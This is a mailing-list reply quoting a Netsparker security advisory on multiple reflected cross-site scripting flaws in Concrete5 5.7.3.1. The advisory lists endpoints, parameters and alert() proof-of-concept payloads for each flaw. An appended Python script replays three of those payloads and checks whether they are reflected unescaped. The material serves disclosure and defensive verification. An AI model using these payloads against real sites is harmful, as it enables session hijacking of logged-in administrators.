I'm honestly surprised it took their team two months to fix this. I've previously reported issues via HackerOne and they were on it within a day. If anyone else is thinking about whitehatting up Concrete5, you might get a faster response if you go through the HackerOne platform. Also, they're friendly and won't pull a Daniel Kerr move on you if you tell them their code is Swiss cheese. Speaking from experience here.

On Wed, May 13, 2015 at 10:29 AM, Onur Yilmaz <[email protected]> wrote:
> Information
> --------------------
> Advisory by Netsparker.
> Name: Multiple XSS Vulnerabilities in Concrete5
> Affected Software: Concrete5
> Affected Versions: 5.7.3.1 and possibly below
> Vendor Homepage: https://www.concrete5.org
> Vulnerability Type: Cross-site Scripting
> Severity: Important
> CVE-ID: CVE-2015-2250
> Netsparker Advisory Reference: NS-15-008
>
> Description
> --------------------
> By exploiting a Cross-site scripting vulnerability the attacker can
> hijack a logged-in user's session. This means that the malicious
> hacker can change the logged-in user's password and invalidate the
> session of the victim while the hacker maintains access. As seen from
> the XSS example in this article, if a web application is vulnerable to
> cross-site scripting and the administrator's session is hijacked, the
> malicious hacker exploiting the vulnerability will have full admin
> privileges on that web application.
>
> Technical Details
> --------------------
> Proof of Concept URLs for cross-site scripting vulnerabilities in
> Concrete5:
>
> URL:
> /concrete5.7.3.1/index.php/dashboard/system/conversations/bannedwords/success
> Parameter Name: banned_word%5b%5d
> Parameter Type: POST
> Attack Pattern: '"--></style></scRipt><scRipt>alert(0x000936)</scRipt>
>
> URL:
> /concrete5.7.3.1/index.php/dashboard/reports/logs/view?keywords=&level=&channel='"--></style></scRipt><scRipt>alert(0x0044C4)</scRipt>&level[]=600
> Parameter Name: channel
> Parameter Type: GET
> Attack Pattern: '"--></style></scRipt><scRipt>alert(0x0044C4)</scRipt>
>
> URL:
> /concrete5.7.3.1/index.php/tools/required/permissions/access_entity?peID=1&pdID=3&accessType='"--></style></scRipt><scRipt>alert(0x00690C)</scRipt>
> Parameter Name: accessType
> Parameter Type: GET
> Attack Pattern: '"--></style></scRipt><scRipt>alert(0x00690C)</scRipt>
>
> URL:
> /concrete5.7.3.1/index.php/dashboard/system/multilingual/setup/load_icon
> Parameter Name: msCountry
> Parameter Type: POST
> Attack Pattern: '"--></style></scRipt><scRipt>alert(0x00D064)</scRipt>
>
> URL:
> /concrete5.7.3.1/index.php/tools/required/permissions/access_entity?accessType='"--></style></scRipt><scRipt>alert(0x00687C)</scRipt>&pkCategoryHandle=block_type
> Parameter Name: accessType
> Parameter Type: GET
> Attack Pattern: '"--></style></scRipt><scRipt>alert(0x00687C)</scRipt>
>
> URL:
> /concrete5.7.3.1/index.php/ccm/system/dialogs/area/design/submit?ccm_token=1423928022:7f9b7c3cb0f6721bab4a0dec86cefaa3&cID=1&arHandle='"--></style></scRipt><scRipt>alert(0x00D33A)</scRipt>
> Parameter Name: arHandle
> Parameter Type: GET
> Attack Pattern: '"--></style></scRipt><scRipt>alert(0x00D33A)</scRipt>
>
> URL: /concrete5.7.3.1/index.php/dashboard/pages/single
> Parameter Name: pageURL:
> Parameter Type: POST
> Attack Pattern: '"--></style></scRipt><scRipt>alert(0x00627A)</scRipt>
>
> URL:
> /concrete5.7.3.1/index.php/ccm/system/dialogs/area/design?arHandle='"--></style></scRipt><scRipt>alert(0x001D34)</scRipt>&cID=1
> Parameter Name: arHandle
> Parameter Type: GET
> Attack Pattern: '"--></style></scRipt><scRipt>alert(0x001D34)</scRipt>
>
> URL: /concrete5.7.3.1/index.php/dashboard/system/seo/searchindex/updated
> Parameter Name: SEARCH_INDEX_AREA_METHOD
> Parameter Type: POST
> Attack Pattern: '" onmouseover= alert(0x00047E)
>
> URL:
> /concrete5.7.3.1/index.php/dashboard/system/optimization/jobs/job_scheduled
> Parameter Name: unit
> Parameter Type: POST
> Attack Pattern: '" onmouseover= alert(0x000C5A)
>
> URL: /concrete5.7.3.1/index.php/dashboard/system/registration/open/1
> Parameter Name: register_notification_email
> Parameter Type: POST
> Attack Pattern: '" onmouseover= alert(0x0000DE)
>
> URL:
> /concrete5.7.3.1/index.php/dashboard/extend/connect/"onmouseover="alert(0x00170E)
> Parameter Name: URI-BASED
> Parameter Type: Full URL:
> Attack Pattern: /"onmouseover="alert(0x00170E)
>
> For more information on cross-site scripting vulnerabilities read the
> following article:
>
> https://www.netsparker.com/web-vulnerability-scanner/vulnerability-security-checks-index/crosssite-scripting-xss/
>
> Advisory Timeline
> --------------------
> 05/03/2015 - First Contact
> 06/05/2015 - Vulnerability fixed
> 11/05/2015 - Advisory released
>
> Solution
> --------------------
> Download Concrete5 version 5.7.4, which includes a fix for this vulnerability.
>
> Credits & Authors
> --------------------
> These issues have been discovered by Omar Kurt while testing
> Netsparker Web Application Security Scanner -
> https://www.netsparker.com/web-vulnerability-scanner/
>
> About Netsparker
> --------------------
> Netsparker finds and reports security issues and vulnerabilities such
> as SQL Injection and Cross-site Scripting (XSS) in all websites and
> web applications regardless of the platform and the technology they
> are built on. Netsparker's unique detection and exploitation
> techniques allow it to be dead accurate in reporting, hence it's the
> first and the only False Positive Free web application security
> scanner. For more information visit our website on
> https://www.netsparker.com
>
> --
> Onur Yılmaz - Turkey Manager
>
> Netsparker Web Application Security Scanner
> T: +90 (0)554 873 0482
>
> _______________________________________________
> Sent through the Full Disclosure mailing list
> https://nmap.org/mailman/listinfo/fulldisclosure
> Web Archives & RSS: http://seclists.org/fulldisclosure/
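The advisory above lists the reflected parameters but not how to confirm, against a given install, whether a payload still comes back unencoded. The script below is an added example written for this page; it is not Netsparker's scanner logic and not Concrete5 code. It takes three of the PoC entries verbatim (path, parameter, GET/POST, payload), builds the matching request, and classifies the reflection using the same trick the `alert(0x...)` markers in the advisory rely on: a unique token that can be found again in the response. The `render_vulnerable` / `render_fixed` templates are constructed stand-ins that mimic a raw `echo` versus output passed through `htmlspecialchars` with `ENT_QUOTES` (the encoding Concrete5's `h()` helper applies), so the whole thing runs offline; replace `mock_fetch` with a real HTTP client to test a live 5.7.3.1 or 5.7.4 instance.

```python
"""Added example: re-check the advisory's PoC payloads for unescaped reflection.

Not Concrete5 or Netsparker code. The render_* functions are constructed
stand-ins for the pre-fix (raw echo) and post-fix (htmlspecialchars) behaviour
so the check runs offline; hand scan() a real HTTP client to test an install.
"""
import re
from urllib.parse import urlencode, urlsplit, parse_qsl

# Representative PoCs copied from the advisory: (path, parameter, method, payload).
POCS = [
    ("/index.php/dashboard/reports/logs/view", "channel", "GET",
     "'\"--></style></scRipt><scRipt>alert(0x0044C4)</scRipt>"),
    ("/index.php/dashboard/system/conversations/bannedwords/success",
     "banned_word[]", "POST",
     "'\"--></style></scRipt><scRipt>alert(0x000936)</scRipt>"),
    ("/index.php/dashboard/system/seo/searchindex/updated",
     "SEARCH_INDEX_AREA_METHOD", "POST",
     "'\" onmouseover= alert(0x00047E)"),
]

# The unique alert(0x...) marker is how the scanner recognises its own payload.
MARKER = re.compile(r"alert\(0x[0-9A-Fa-f]+\)")


def build_request(base, path, param, method, payload):
    """(method, url, body): GET payloads go in the query string, POST payloads
    in a form-encoded body, matching the Parameter Type in the advisory."""
    if method == "GET":
        return "GET", f"{base}{path}?{urlencode({param: payload})}", None
    return "POST", f"{base}{path}", urlencode({param: payload}).encode()


def php_htmlspecialchars(s):
    """Python equivalent of PHP htmlspecialchars($s, ENT_QUOTES), the encoding
    applied by Concrete5's h() output helper (assumed equivalence)."""
    return (s.replace("&", "&amp;").replace("<", "&lt;").replace(">", "&gt;")
             .replace('"', "&quot;").replace("'", "&#039;"))


def render_vulnerable(value, attr=False):
    """Constructed pre-fix behaviour: the parameter is echoed raw, either into
    a quoted attribute value (the onmouseover payloads) or into a text node."""
    if attr:
        return f'<input type="text" name="q" value="{value}">'
    return f"<td>{value}</td>"


def render_fixed(value, attr=False):
    """Constructed post-fix behaviour: same template, value passed through h()."""
    return render_vulnerable(php_htmlspecialchars(value), attr)


def classify_reflection(body, payload):
    """'raw'    : payload reflected byte-for-byte, markup/handler injection works
       'escaped': only the alert marker survives, metacharacters were encoded
       'none'   : marker absent, this parameter is not reflected in this response"""
    m = MARKER.search(payload)
    marker = m.group(0) if m else payload
    if payload in body:
        return "raw"
    if marker in body:
        return "escaped"
    return "none"


def scan(base, fetch):
    """Run every PoC through fetch(method, url, body) -> response text and
    return {parameter: classification}."""
    results = {}
    for path, param, method, payload in POCS:
        method, url, body = build_request(base, path, param, method, payload)
        results[param] = classify_reflection(fetch(method, url, body), payload)
    return results


def mock_fetch(render):
    """Offline HTTP client stand-in: pull the payload back out of the request
    and render it with the given template (attribute context for onmouseover)."""
    def fetch(method, url, body):
        query = urlsplit(url).query if method == "GET" else body.decode()
        (param, value), = parse_qsl(query)
        return render(value, attr="onmouseover" in value)
    return fetch


if __name__ == "__main__":
    print("raw echo   (5.7.3.1 behaviour):", scan("http://localhost", mock_fetch(render_vulnerable)))
    print("h() output (5.7.4 behaviour)  :", scan("http://localhost", mock_fetch(render_fixed)))
```

Two caveats when pointing this at a real target: a `raw` verdict means the metacharacters reached the page unencoded, which is what the advisory's `alert()` PoCs demonstrate, but the check does not execute JavaScript and so says nothing about DOM-based issues; and `htmlspecialchars` is the right encoding only for HTML text and quoted-attribute contexts, so a value that lands inside a `<script>` string or a URL needs context-specific encoding instead.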
